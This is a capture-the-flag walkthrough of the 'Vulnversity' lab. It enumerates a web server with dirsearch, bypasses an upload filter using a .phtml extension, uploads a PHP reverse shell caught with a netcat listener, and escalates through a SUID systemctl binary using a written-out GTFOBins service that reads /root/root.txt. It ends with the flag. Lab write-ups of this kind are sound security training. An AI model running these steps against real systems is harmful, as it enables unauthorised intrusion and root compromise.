Search

Vulnversity

goal: get the contents of /root/root.txt and you might not need root to do that!

FTP not anon login

SMB can’t find much

Website:

  • dirbuster didn’t work
  • dirsearch

dirsearch:

cd /opt/dirsearch
sudo python3 dirsearch.py -u http://10.10.88.73:3333/ -e html -x 400,401,403

result:

image

normal except:

/internal

it’s a file upload. Can we upload and execute?

image

png extension not allowed and it’s php.

Search for php shell

we found:

pentest monkey (we used this before): Embed GitHubEmbed GitHub

make a new file with it to upload

mousepad phprevers.php

and change IP to tun0 and port to whatever you want (I used 4444)

and open nc listener:

nc -nvlp 4444

upload and test?

not allowed. Valid extensions to use and test:

Note: the smart way to test it is by sending the upload page to burpsuite’s intruder and seeing which one doesn’t come back with “extension not allowed” since the request page takes the filename as an argument

  1. go to intruder and highlight “php” and click “add”
  2. sniper attack
  3. go to payload and add the possibilities:
.php
.php3
.php4
.php5
.php6
.phtml
  1. go to options
    1. in grep match, clear and paste “Extension not allowed”
  2. at the bottom, follow redirections: always
  3. In results, the only one that didn’t have extension was phtml.
    1. also, length is the same for all except this one
    2. we could also look at status
mv phpreverse.php3 phpreverse.php4
mv phpreverse.php5 phpreverse.phtml

that one worked! navigate:

http://10.10.88.73:3333/internal/phpreverse.phtml

not found

10.10.88.73:3333/phpreverse.phtml

not found

can we find where it goes using burp?

add website to scope and intercept on then upload again

Nothing. We can check upload folder:

website/internal/upload
website/internal/uploads

found it!

http://10.10.88.73:3333/internal/uploads/

run the php reverse shell (make sure nc listener is up)

we get shell on the server as www-data

query for the SUID perms:

find / -perm -u=s -type f 2>/dev/null

list:

/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

check GTFOBins:

/bin/systemctl

that one’s a match!

how to use:

Source

#sudo install -m =xs $(which systemctl) .              <- dot is included
#this line above is only needed if not already installed
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

cd where we got the path from the first command:

cd /bin/

and run the commands in order and one-by-one

we make a TF temp service that cats root.txt and saved it to output file inside tmp

then cat output:

cat /tmp/output

we get flag:

a58ff8579f0a9270368d33a9966c7fd5